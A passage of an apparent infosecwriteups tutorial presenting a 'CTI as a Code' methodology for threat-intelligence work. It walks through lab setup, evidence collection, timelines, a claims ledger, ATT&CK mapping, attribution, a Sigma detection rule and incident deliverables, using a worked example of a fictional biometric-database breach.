href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#6784"><strong>Why This Methodology Exists</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#b46b"><strong>The Four Operational Modes</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#cb45"><strong>Setup: Get the Repository and Start the Lab</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#c53b"><strong>Step 1: Initial Information Gathering — Ask Before You Look</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#d265"><strong>Step 2: Create Your Project Folder from the Template</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#36d3"><strong>Step 3: Scope the Project</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#335f"><strong>Reactive Mode</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#6db6"><strong>Step R1: Collect and Inventory Evidence</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#5c1f"><strong>Step R2: Build the Timeline with Evidence Labels</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#5f05"><strong>Step R3: Claims Ledger</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#869b"><strong>Step R4: ATT&amp;CK Mapping with Gap Classification</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#a66f"><strong>Step R5: Attribution Assessment</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#f976"><strong>Step R6: Derive Sigma Rules for Every Missed Technique</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#5fa2"><strong>Step R7: Produce Deliverables</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#97d7"><strong>Proactive Mode</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#f071"><strong>Step P1: Copy the Template</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#c4a2"><strong>Step P2: Run the Intake</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#4a2d"><strong>Step P3: Assess Trigger Intelligence</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#7af0"><strong>Step P4: Crown Jewels Analysis</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#1f9b"><strong>Step P5: Model Attack Scenarios</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#f509"><strong>Step P6: Build the Detection Backlog</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#137b"><strong>Full Cycle Mode: Building a CTI Program</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#675c"><strong>Adversary Emulation Mode: Validating Coverage</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#ef34"><strong>Git Discipline — The Same for All Modes</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#8924"><strong>Minimum-Viable Path: No Lab Required</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#9250"><strong>The Ecosystem</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#e265"><strong>Where to Start</strong></a></li></ul><h3>The Four Operational Modes</h3><p>Before picking up a tool, identify which mode you are in:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*09U-tRkFVOmP2S1zQVDk3A.png"></figure><p>The four modes share the same scaffold, the same analytical discipline, and the same git workflow. The difference is which steps you run and in what order.</p><h3>Setup: Get the Repository and Start the Lab</h3><h4>Clone the repository</h4><pre>git clone https://github.com/anpa1200/CTI_as_a_Code.git<br>cd CTI_as_a_Code</pre><p><strong>Repository structure:</strong></p><pre>CTI_as_a_Code/<br>├── docker-compose.yml          ← full lab stack (OpenCTI, TheHive, Elastic, Cortex)<br>├── .env.example                ← all secrets in one place; copy to .env before starting<br>├── scripts/<br>│   ├── setup.sh                ← first-time initialization (connectors, indexes, users)<br>│   └── health-check.sh         ← confirms all services return HTTP 200<br>├── templates/                  ← blank investigation scaffolds — copy these to start<br>│   ├── reactive/<br>│   ├── proactive/<br>│   ├── full-cycle/<br>│   └── adversary-emulation.md<br>└── training/                   ← 8 fully populated case folders with worked solutions<br>    ├── A01-reactive-lifetech/<br>    ├── A02-proactive-celltronx/<br>    └── ...</pre><h3>Start the lab (optional but recommended)</h3><pre>cp .env.example .env<br># Open .env and set all passwords before the next command<br>nano .env</pre><pre># Elasticsearch requires this kernel parameter<br>sudo sysctl -w vm.max_map_count=262144</pre><pre>docker compose up -d</pre><pre>./scripts/setup.sh          # runs once; configures MITRE ATT&amp;CK connector, indexes, initial users</pre><pre>./scripts/health-check.sh   # all services should return HTTP 200</pre><p>Once running:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nNaWz-7T0T3H17eNc7DeRA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6Vk-MOSzNyILrQqlDeMxTg.png"></figure><p>You do not need the lab to run the methodology. The minimum-viable path at the end of this article covers what to use instead.</p><h3>Step 1: Initial Information Gathering — Ask Before You Look</h3><p><strong>This is the step most analysts skip. It is the most important step.</strong></p><p>Before you open a log file, before you run a query, before you create a case — you need to understand what the reporter knows, what has already been touched, and what constraints exist. Getting this wrong means analyzing the wrong systems, missing the actual entry point, or tainting evidence that could later matter to regulators or legal.</p><p>This step applies to all modes:</p><ul><li><strong>Reactive</strong>: gather from the person who reported or discovered the incident</li><li><strong>Proactive</strong>: gather from the person who assigned the assessment (CISO, management, compliance)</li><li><strong>Full Cycle</strong>: gather from the sponsor of the program build</li><li><strong>Emulation</strong>: gather from the authorization chain</li></ul><p>Run this as a structured conversation — a call, a meeting, or a written intake form filled in by the requester. Take verbatim notes. Do not interpret or analyze during this step; just capture.</p><p>→ <strong>Reactive Investigation — Intake</strong> — full intake form, why each section matters, and how to commit the intake into the project git history.</p><h3>Step 2: Create Your Project Folder from the Template</h3><p>After intake, create the project folder and commit the intake document into it:</p><pre># Choose the template matching your mode<br>cp -r CTI_as_a_Code/templates/reactive/   investigations/myorg-incident-2025-03/<br>cd investigations/myorg-incident-2025-03/<br>git init<br>git add .<br>git commit -m "PROJ-001: scaffold initialized"<br># Copy your intake notes into the project<br>cp /path/to/intake-notes.md 00-scope/intake.md<br>git add 00-scope/intake.md<br>git commit -m "PROJ-001: intake complete - initial hypothesis: AiTM contractor credential theft"</pre><p>The intake document becomes the first record in the investigation’s git history. Every subsequent commit builds on it. When the investigation is reviewed three months later, the git log shows what was known when, and what the analyst’s reasoning was at each stage.</p><h3>Step 3: Scope the Project</h3><p><strong>File:</strong> 00-scope/scope.md | <strong>Role:</strong> Team Lead | <strong>Time:</strong> 30 min</p><p>The scope document translates the intake into a formal project definition. It is signed off by the stakeholder before analysis begins. Scope changes during the investigation require a new commit with explicit justification — this prevents scope creep and keeps the git history honest.</p><pre># Scope — PROJ-001 — MyOrg Incident 2025-03<br>Signed off by: CISO (Rachel K.) | Date: 2025-03-18 09:00 IST<br>## In scope<br>- Systems: HOST-01, HOST-02, vpn-gw-01, db-01<br>- Time range: 2025-03-15 00:00 IST - 2025-03-18 23:59 IST<br>- Evidence: Winlogbeat JSONL, VPN gateway logs, DB audit log, netflow<br>## Out of scope<br>- Cloud infrastructure - separate authorization required; pending CISO approval<br>- Employee endpoints outside the affected /24 subnet<br>## PIRs (Priority Intelligence Requirements)<br>These are the specific questions this investigation must answer. Analysis is complete<br>when all PIRs have an assessed answer or are explicitly closed as unanswerable.<br>- PIR-001: Did the adversary access or exfiltrate biometric records from db-01?<br>- PIR-002: What was the initial access vector - how did they get in?<br>- PIR-003: Is there any indication of ongoing access or persistence as of 2025-03-18?<br>## Stakeholders<br>- Commissioned by: CISO<br>- Deliverables to: CISO, IR Lead, Legal<br>- Scope change authority: CISO only - any scope expansion requires written approval<br>## Evidence handling<br>- TLP: AMBER - share with CERT-IL only with explicit CISO approval<br>- Legal hold on all artifacts pending INCD notification decision - do not delete anything<br>- Do not access db-01 production environment directly - use log copies only</pre><p>Commit and get written sign-off (Slack, email, or a note in the case):</p><pre>git add 00-scope/<br>git commit -m "PROJ-001: scope signed off by CISO — PIR-001 through PIR-003, TLP AMBER, legal hold"</pre><h3>Reactive Mode: Full Walkthrough</h3><h3>Step R1: Collect and Inventory Evidence</h3><p><strong>File:</strong> 01-evidence/README.md | <strong>Time:</strong> 2–8 h depending on evidence volume</p><p>Before any analysis, build the complete evidence inventory. The rule: <strong>you do not analyze what you have not inventoried.</strong> Working from untracked evidence is how findings get missed and how the chain of custody breaks.</p><p><strong>Collection with Velociraptor (remote, no reboot required):</strong></p><pre># Collect Windows Security event log from HOST-01<br>velociraptor -v artifacts collect Windows.EventLogs.Evtx \<br>  --args EventLog=Security \<br>  --output HOST-01-security.jsonl<br><br># Collect Sysmon (process creation, network, file events)<br>velociraptor -v artifacts collect Windows.EventLogs.Evtx \<br>  --args EventLog="Microsoft-Windows-Sysmon/Operational" \<br>  --output HOST-01-sysmon.jsonl<br><br># Collect PowerShell script block logging<br>velociraptor -v artifacts collect Windows.EventLogs.Evtx \<br>  --args EventLog="Microsoft-Windows-PowerShell/Operational" \<br>  --output HOST-01-powershell.jsonl</pre><p><strong>Hash all collected evidence immediately:</strong></p><pre>sha256sum HOST-01-security.jsonl HOST-01-sysmon.jsonl vpn-gw-2025-03-17.jsonl \<br>  &gt; evidence-checksums.sha256<br>git add evidence-checksums.sha256<br>git commit -m "PROJ-001: evidence checksums - chain of custody established"</pre><p><strong>Build the inventory table:</strong></p><pre>| Source | File | Systems | Time Range | Gap | SHA256 | Usability |<br>|---|---|---|---|---|---|---|<br>| Windows Security log | HOST-01-security.jsonl | HOST-01 | 2025-03-15 – 2025-03-18 | None | a3f1... | High |<br>| Sysmon | HOST-01-sysmon.jsonl | HOST-01 | 2025-03-15 – 2025-03-18 | GAP-001: 03:00–07:00 IST on 03-17 | b2e4... | High (with gap) |<br>| VPN gateway | vpn-gw-2025-03-17.jsonl | vpn-gw-01 | 2025-03-17 only | None | c9d7... | High |<br>| DB audit log | vrid-audit-2025-03-17.jsonl | db-01 | 2025-03-17 00:00–06:00 | Post-06:00 log rotation lost | d4a2... | Medium |<br>| Netflow | govnet-ops-2025-03-17.jsonl | All | 2025-03-17 | None | e8b3... | High |</pre><p><strong>Document every gap explicitly:</strong></p><pre>## GAP-001 — HOST-01 Sysmon | 2025-03-17 03:00–07:00 IST<br>Missing event types: process creation (EID 1), network connections (EID 3), file creation (EID 11)<br>Duration: 4 hours<br>Root cause: Sysmon service crash; restart at 07:02 confirmed in System log<br>What does cover this window: Security log (EID 4624, 4688 partial) - some process activity visible<br>Confidence impact: T1059, T1055, T1136, T1543 activity during this window CANNOT be confirmed<br>  or ruled out. Any claim about adversary actions between 03:00–07:00 must be labeled HYPOTHESIZED<br>  unless supported by netflow or DB audit log.</pre><p><strong>Normalize to super-timeline with Plaso:</strong></p><pre>log2timeline.py --storage-file PROJ-001.plaso \<br>  HOST-01-security.jsonl \<br>  HOST-01-sysmon.jsonl \<br>  vpn-gw-2025-03-17.jsonl \<br>  vrid-audit-2025-03-17.jsonl \<br>  govnet-ops-2025-03-17.jsonl<br><br>psort.py -o l2tcsv PROJ-001.plaso \<br>  --slice "2025-03-17T00:00:00" \<br>  --slice_size 1440 \<br>  &gt; supertimeline-2025-03-17.csv</pre><p><strong>Rapid Sigma triage with Hayabusa before Timesketch setup:</strong></p><pre>hayabusa csv-timeline \<br>  --directory ./evtx/ \<br>  --output hayabusa-triage.csv \<br>  --profile verbose \<br>  --min-level medium<br><br># Sort by severity to find high-confidence hits first<br>sort -t',' -k5 -r hayabusa-triage.csv | head -50<br><br>git add 01-evidence/<br>git commit -m "PROJ-001: evidence inventory - 5 sources, GAP-001 documented (4h Sysmon outage on 03-17)"</pre><h3>Step R2: Build the Timeline with Evidence Labels</h3><p><strong>File:</strong> 03-analysis/timeline/timeline.md | <strong>Time:</strong> 4–20 h</p><p>The timeline is a chronological log of every relevant event with three things that most timelines omit: <strong>evidence citations, evidence labels, and ATT&amp;CK technique mappings</strong>.</p><p><strong>Evidence label system — every event gets one:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nig_2_h62AbfTNhj8HVnQQ.png"></figure><p><strong>Why labels matter:</strong> Without them, analysts conflate what they saw with what they inferred. The label forces explicit acknowledgment of how strong each piece of evidence is. When an executive asks “are you sure they took the data?”, the answer is “CONFIRMED — two independent sources (DB audit log and netflow) both show 892 MB outbound” not “we think so.”</p><p><strong>Example timeline entries:</strong></p><pre>## 2025-03-17 02:09:41 IST | CORROBORATED | T1566.001<br>Email gateway: message delivered to contractor-07@myorg.il from spoofed.vendor@mailpro[.]cc<br>Attachment: Q1-Invoice-2025.docx (SHA256: 4a7f...)<br>Single source — email gateway log only; no AV alert (attachment not flagged at delivery)<br>Note: This is the suspected initial delivery. No click/open event confirmed yet.<br><br>## 2025-03-17 02:14:23 IST | CONFIRMED | T1078.001<br>VPN gateway: authentication from 185.234.x.x, UserID: contractor-07<br>Source 1: vpn-gw-2025-03-17.jsonl line 4,471 - SessionID: VPN-20250317-8821<br>Source 2: RADIUS auth log - same SessionID, same source IP, same timestamp ±2s<br>No prior VPN session history for contractor-07 from this IP. HR confirmed contractor-07<br>was not working on 2025-03-17. Two independent sources → CONFIRMED.<br>PIR-002 status: partial answer - likely credential theft prior to this event<br>## 2025-03-17 02:17–02:44 IST | INFERRED | T1021.001<br>Adversary likely moved laterally from contractor jump host to db-01 during this window.<br>Inference basis: VPN session established at 02:14 (CONFIRMED); DB access at 02:47 (CONFIRMED);<br>no direct evidence of the lateral movement path - jump host Sysmon logs not available.<br>This step is inferred from the 30-minute gap between VPN auth and DB access.<br>Cannot confirm the specific technique (RDP, SMB, other) without jump host logs.<br>## 2025-03-17 02:47:11 IST | CONFIRMED | T1048.003<br>DB audit log: SELECT * on biometric_records from 185.234.x.x<br>Source 1: vrid-audit-2025-03-17.jsonl line 892 - full-table SELECT, 340,218 rows<br>Source 2: netflow - 892.4 MB outbound from db-01 to 185.234.x.x at 02:47:11–02:51:33<br>PIR-001 status: ANSWERED YES - biometric records accessed and exfiltrated<br>## 2025-03-17 03:00–07:00 IST | GAP (GAP-001)<br>Sysmon coverage lost. Security log partial. Cannot confirm or rule out:<br>- T1059.001/003 (command execution)<br>- T1136 (account creation / persistence)<br>- T1105 (tool staging)<br>See GAP-001 in evidence inventory for impact assessment.</pre><h3>Step R3: Claims Ledger</h3><p><strong>File:</strong> 03-analysis/claims/claims-ledger.md | <strong>Time:</strong> 1–2 h</p><p>The claims ledger is the single most important document in the investigation. It is what transforms a timeline narrative into structured, auditable analysis.</p><p><strong>Every row answers five questions:</strong></p><ol><li>What is the specific assertion? (One sentence, falsifiable)</li><li>What evidence supports it? (File path and line number)</li><li>How confident are we? (High / Medium / Low with rationale)</li><li>What alternative explanations were considered? (And why were they ruled out or left open)</li><li>Which PIR does this answer?</li></ol><pre>| ID | Claim | Evidence | Confidence | Competing Hypotheses | PIR |<br>|---|---|---|---|---|---|<br>| CL-001 | Adversary authenticated to the VPN using valid credentials for contractor-07 at 02:14 IST on 2025-03-17 | vpn-gw.jsonl:4471 + RADIUS log (same SessionID) | High | Legitimate login — ruled out: no prior session from this IP; contractor confirmed offline by HR; IP geolocates to Iranian hosting provider | PIR-002 |<br>| CL-002 | The biometric_records database was fully exfiltrated (340,218 rows, 892.4 MB) at 02:47–02:51 IST | db-audit.jsonl:892 (SELECT *) + netflow (892.4 MB from db-01 to 185.234.x.x) | High | Scheduled backup — ruled out: backup confirmed at 04:00; no authorized job at 02:47; db-admin confirmed no maintenance scheduled | PIR-001 |<br>| CL-003 | Initial credential theft was via AiTM phishing, not brute force or purchase | Session token replay pattern in VPN auth (no prior failed auths, immediate successful auth from new IP); email delivery confirmed 5 min before VPN auth | Medium | Credential purchase / insider — cannot fully rule out without forensic analysis of contractor-07 endpoint | PIR-002 |<br>| CL-004 | Persistence mechanism is unknown; cannot be determined | No log coverage during GAP-001 (03:00–07:00); no scheduled task, registry, or service evidence outside this window | Insufficient | Unknown — GAP-001 prevents assessment | PIR-003 |<br>| CL-005 | No confirmed evidence of access after 2025-03-17 07:02 IST (Sysmon restart) | All log sources show no activity from 185.234.x.x after 03:21 | Medium | Adversary using different infrastructure after initial exfil — cannot rule out; recommend threat hunt | PIR-003 |</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yONlPrE838ua7WNi6ho5Zg.png"></figure><p>The claims ledger drives everything downstream:</p><ul><li>Executive brief cites CL-IDs, not raw log lines</li><li>SOC handoff uses claims to justify IOC confidence</li><li>Attribution assessment cites claims as the evidence basis</li><li>Sigma rules reference which claim they would have detected</li></ul><pre>git add 03-analysis/claims/ 03-analysis/timeline/<br>git commit -m "PROJ-001: analysis — 16-event timeline, 5 claims; PIR-001 YES (CL-002), PIR-002 MEDIUM (CL-001/CL-003)"</pre><h3>Step R4: ATT&amp;CK Mapping with Gap Classification</h3><p><strong>File:</strong> 03-analysis/attck-mapping/attck-mapping.md | <strong>Time:</strong> 1–2 h</p><p>The ATT&amp;CK mapping has two purposes: documenting what happened (intelligence) and measuring detection coverage (operations). The <strong>Gap Type</strong> column is the operational output — it tells the SOC and engineering teams exactly what kind of work is needed for each missed technique.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rvDNkZD3SroVie2Jw28HgA.png"></figure><pre>| # | Tactic | Technique | Sub | Evidence | Confidence | Rule Fired? | Gap Type | Remediation |<br>|---|---|---|---|---|---|---|---|---|<br>| 1 | Initial Access | T1566.001 | — | Email gateway log | High | Partial | Coverage incomplete | Fix email gateway rule to extract attachment hash |<br>| 2 | Credential Access | T1557 | — | VPN timing pattern (CL-003) | Medium | No | Rule missing | Write Sigma rule DET-002; VPN logs are in SIEM |<br>| 3 | Initial Access | T1078.001 | — | VPN auth (CL-001) | High | No | Rule missing | Write Sigma rule DET-003 for anomalous VPN auth |<br>| 4 | Lateral Movement | T1021.001 | — | Inferred (CL-002 timing) | Low | Unknown | Data source missing | Jump host logs not ingested — engineering ticket |<br>| 5 | Collection/Exfil | T1048.003 | — | DB audit + netflow (CL-002) | High | No | Data source missing | DB audit log not in SIEM — Logstash pipeline needed |<br>| 6 | Impact (unknown) | Unknown | — | GAP-001 | — | Unknown | Architectural gap | Sysmon reliability improvement — separate track |</pre><p><strong>Gap taxonomy (each type requires different remediation):</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*J6GUO2cJkmFyqSUGMS2pdQ.png"></figure><p>Export the Navigator layer and commit it:</p><pre># In ATT&amp;CK Navigator: build your coverage layer (green=detected, yellow=partial, red=missed)<br># Export as JSON: Layer → Download as JSON<br># Save to: 03-analysis/attck-mapping/navigator-layer.json<br>git add 03-analysis/attck-mapping/<br>git commit -m "PROJ-001: ATT&amp;CK mapping - 6 techniques; 2 rule-missing, 2 data-source-missing, 1 incomplete, 1 arch-gap"</pre><p><strong>Decider — guided ATT&amp;CK mapping when the technique is unclear:</strong></p><p>When you observe a behavior but are not certain which ATT&amp;CK technique or sub-technique it maps to, <a href="https://github.com/cisagov/Decider">Decider</a> (CISA) walks you to the correct answer through a structured question tree. Instead of searching the ATT&amp;CK site manually, Decider asks what the adversary was trying to accomplish, then narrows to the correct tactic, technique, and sub-technique.</p><pre># Run Decider locally with Docker (one-time setup)<br>git clone https://github.com/cisagov/Decider.git<br>cd Decider<br>cp .env.docker .env<br># Edit .env — set DB_ADMIN_PASS, DB_KIOSK_PASS, CART_ENC_KEY, APP_ADMIN_PASS<br>cp -r default_config/. config/<br>sudo docker compose up<br># Visit http://localhost:8001</pre><p><strong>Workflow within Step R4:</strong></p><ol><li><strong>Question Tree</strong> — navigate Matrix → Tactic → Technique → Sub-technique by answering what the adversary did. Useful when the behavior is ambiguous (e.g., distinguishing T1059.001 from T1059.003 from an encoded command line, or deciding between T1078.001 and T1078.002 for a credential re-use event).</li><li><strong>Full Technique Search</strong> — boolean search with prefix-matching and stemming across all ATT&amp;CK descriptions. Faster than the ATT&amp;CK site when you have a partial technique name or keyword from a log line.</li><li><strong>Cart → Export</strong> — add confirmed techniques to the cart as you work through the mapping table. Export as a Navigator layer JSON (heatmap) or a formatted table for the attck-mapping.md file.</li></ol><p>Decider does not replace the ATT&amp;CK Navigator — it answers the “which technique is this?” question before you get to the Navigator layer. Use Decider to map, Navigator to visualize coverage.</p><p>Export the Navigator layer and commit it:</p><pre># In ATT&amp;CK Navigator: build your coverage layer (green=detected, yellow=partial, red=missed)<br># Export as JSON: Layer → Download as JSON<br># Save to: 03-analysis/attck-mapping/navigator-layer.json</pre><pre>git add 03-analysis/attck-mapping/<br>git commit -m "PROJ-001: ATT&amp;CK mapping - 6 techniques; 2 rule-missing, 2 data-source-missing, 1 incomplete, 1 arch-gap"</pre><h3>Step R5: Attribution Assessment</h3><p><strong>File:</strong> 03-analysis/attribution/attribution.md | <strong>Time:</strong> 1–2 h</p><p>Write the attribution section only after the claims ledger is complete. Attribution that precedes the evidence analysis is a hypothesis, not a conclusion. The sequence matters.</p><p><strong>The confidence ladder — use the correct language for the evidence you have:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rvLOfrTbbnV3ctLoJbzwbQ.png"></figure><p>Infrastructure pivoting for attribution — run from the C2 IP before enrichment ages:</p><pre># Passive DNS and co-hosting<br>curl "https://api.shodan.io/shodan/host/185.234.x.x?key=YOUR_KEY" | jq '.hostnames, .ports, .data[].banner'<br><br># VirusTotal for prior detection history and passive DNS<br># Certificate transparency - find co-hosted domains by SAN entries<br># MISP cross-correlation - does this IP appear in prior community events?<br>## Attribution Assessment - PROJ-001<br>### Evidence available<br>- AiTM credential interception via reverse proxy: consistent with CERT-IL CB-2025-041 actor profile<br>- C2 IP 185.234.x.x: passive DNS shows co-hosting with domains flagged in CERT-IL events<br>  CB-2025-039 and CB-2025-031 (confirmed via MISP cross-correlation)<br>- Tooling: cannot assess - no malware recovered due to GAP-001<br>- TTP overlap: T1557 + T1078.001 + T1048.003 consistent with cluster profile from CB-2025-041<br>### Confidence: Medium<br>Two data points (TTP overlap + infrastructure overlap with prior CERT-IL events) provide<br>corroborating evidence. Independent confirmation would require: (a) toolset match from<br>contractor-07 endpoint forensics, or (b) CERT-IL deconfliction confirming this IP in an<br>active track. Neither is currently available.<br>### Language for deliverables<br>"Activity assessed as consistent with the Iranian-nexus contractor-targeting cluster<br>documented in CERT-IL CB-2025-041 (medium confidence), based on AiTM tradecraft overlap<br>and C2 infrastructure observed in two prior CERT-IL-flagged events. Toolset confirmation<br>is not possible due to evidence gap GAP-001."</pre><h3>Step R6: Derive Sigma Rules for Every Missed Technique</h3><p><strong>Files:</strong> 04-detections/sigma/DET-NNN-name.yml | <strong>Time:</strong> 30–60 min per rule</p><p>For each “Rule missing” or “Coverage incomplete” entry in the ATT&amp;CK mapping, write a Sigma rule. The Sigma file references the investigation, the technique, and the validation result — creating a permanent link between intelligence and detection:</p><pre>title: Anomalous VPN Authentication — New Source IP for Known User<br>id: 7a3c9b1d-5678-4321-efab-9876543210cd<br>status: experimental<br>description: &gt;<br>  Detects a VPN authentication from a source IP with no prior history for the authenticating user.<br>  Consistent with AiTM credential replay (T1078.001 + T1557).<br>  Derived from PROJ-001 — initial access step, CL-001 (high confidence).<br>author: CTI Team — PROJ-001<br>date: 2025-03-19<br>logsource:<br>    category: network<br>    product: palo_alto_vpn        # adjust to your VPN product<br>detection:<br>    selection:<br>        event.action: vpn_auth_success<br>        user.name|exists: true<br>    filter_known:<br>        source.ip|cidr:<br>            - '10.0.0.0/8'         # corporate NAT ranges<br>            - '172.16.0.0/12'<br>    condition: selection and not filter_known<br>falsepositives:<br>    - VPN access from legitimate travel (new country/IP) — validate against HR travel records<br>    - New contractor onboarding from home IP — coordinate with IT<br>level: medium<br>tags:<br>    - attack.initial_access<br>    - attack.credential_access<br>    - attack.t1078.001<br>    - attack.t1557<br># PROJ-001: DET-003 | Gap: ATT&amp;CK row 3 (Rule missing)<br># Validated: PASS | 2025-03-19 | hayabusa against PROJ-001 evtx set</pre><p><strong>Validation before deployment:</strong></p><pre># Step 1: Confirm the rule fires on the known true-positive event in the incident evtx set<br>hayabusa csv-timeline \<br>  --directory ./evtx/ \<br>  --rules ./04-detections/sigma/DET-003-vpn-new-source-ip.yml \<br>  --output validate-DET-003.csv<br># Check the output includes the 02:14 event from contractor-07<br>grep "contractor-07" validate-DET-003.csv<br># Step 2: Convert to Elastic Lucene for deployment<br>pip install pySigma-backend-elasticsearch sigma-cli<br>sigma convert -t lucene -p ecs_windows \<br>  04-detections/sigma/DET-003-vpn-new-source-ip.yml<br># Step 3: Convert to ES|QL (alternative format for newer Elastic stacks)<br>sigma convert -t esql -p ecs_windows \<br>  04-detections/sigma/DET-003-vpn-new-source-ip.yml</pre><pre>git add 04-detections/<br>git commit -m "PROJ-001: detections — DET-001 through DET-004 written and validated PASS via Hayabusa"</pre><h3>Step R7: Produce Deliverables</h3><p><strong>Files:</strong> 05-deliverables/ | <strong>Time:</strong> 2–4 h</p><p><strong>Executive brief — maximum 1 page, no technical artifacts:</strong></p><pre># Incident Brief — PROJ-001 [TLP: AMBER]<br>2025-03-19 | For: CISO, IR Lead, Legal<br>## What happened<br>An assessed Iranian-nexus actor accessed the NDSA biometric records database on 2025-03-17<br>using stolen VPN credentials belonging to contractor-07, exfiltrating approximately 340,218<br>biometric records. Initial entry occurred at 02:14 IST; exfiltration completed by 02:51 IST.<br>## Business impact<br>INCD notification is required within 72 hours of discovery (deadline: 2025-03-20 02:14 IST).<br>Biometric Database Authority notification required under Section 12 of the Biometric Database Law.<br>No confirmed evidence of ongoing access as of investigation date.<br>## Key findings<br>- The adversary used valid contractor credentials obtained through suspected phishing - no brute<br>  force or technical exploit was required to enter the network<br>- The full biometric records table (340,218 records) was extracted in a single session lasting 4 minutes<br>- Three of five adversary techniques had no detection coverage at the time of the incident;<br>  none of the five triggered an alert<br>## What was not detected<br>The credential theft, the VPN login from an unrecognized IP, and the database exfiltration<br>all occurred without generating a single security alert. The incident was discovered through<br>a retrospective log review 36 hours after it concluded, not through real-time detection.<br>## Recommended actions<br>1. [IR Lead - by 18:00 today] Revoke and rotate all contractor VPN credentials<br>2. [CISO - by 02:14 IST 2025-03-20] File INCD notification using the PROJ-001 incident report<br>3. [SOC Lead - by end of week] Deploy detection rules DET-001 through DET-004 to Kibana; submit<br>   DB audit log pipeline to engineering as P0 ticket</pre><p><strong>SOC handoff contains the operational package — not narrative, only actionable data:</strong></p><pre># SOC Handoff — PROJ-001<br>## Current IOCs (valid as of 2025-03-19)<br>| Type | Value | Confidence | TTL | Action |<br>|---|---|---|---|---|<br>| IPv4 | 185.234.x.x | High | 30 days | Block at perimeter; alert on any new connections |<br>| Domain | spoofed.vendor@mailpro[.]cc | High | 30 days | Block at email gateway |<br>| SHA256 | 4a7f... (Q1-Invoice-2025.docx) | Medium | 90 days | Block at endpoint |<br>## Rules deployed / pending<br>| Rule ID | Status | CAB ticket | Covers |<br>|---|---|---|---|<br>| DET-001 | Deployed 2025-03-19 14:00 | CAB-2025-0341 | T1566.001 email delivery |<br>| DET-003 | Deployed 2025-03-19 14:00 | CAB-2025-0341 | T1078.001 anomalous VPN auth |<br>| DET-002 | Pending - blocked on VPN log pipeline | ENG-0234 | T1557 AiTM session replay |<br>| DET-004 | Pending - blocked on DB audit pipeline | ENG-0235 | T1048.003 DB exfiltration |<br>## Hunting queries (residual activity)<br>Hunt for additional sessions from the same ASN as 185.234.x.x in the 30 days before the incident.<br>Hunt for any contractor accounts that authenticated successfully from IPs with no prior history.<br>## Escalation criteria<br>Escalate immediately if:<br>- Any new connection from 185.234.x.x or the /24 subnet<br>- Any authentication from contractor-07 or other contractor accounts outside working hours<br>- Any new SELECT * queries against the biometric_records table</pre><h3>Proactive Mode: Full Walkthrough</h3><h3>Step P1: Copy the Template</h3><pre>cp -r CTI_as_a_Code/templates/proactive/ assessments/myorg-threat-model-2025-q2/<br>cd assessments/myorg-threat-model-2025-q2/<br>git init &amp;&amp; git add . &amp;&amp; git commit -m "PROJ-002: proactive scaffold initialized"</pre><p>Proactive template structure:</p><pre>proactive/<br>├── 00-scope/scope.md<br>├── 01-trigger-intelligence/<br>│   ├── trigger-assessment.md           ← summary across all triggers<br>│   └── triggers/<br>│       ├── TRG-001-cert-il-advisory.md<br>│       └── TRG-NNN-name.md             ← one file per trigger<br>├── 02-crown-jewels/<br>│   └── crown-jewels.md<br>├── 03-threat-model/<br>│   ├── attack-paths.md                 ← paths from entry to crown jewels<br>│   └── scenarios/<br>│       └── SCN-NNN-name.md             ← one per attack path<br>├── 04-detection-backlog/<br>│  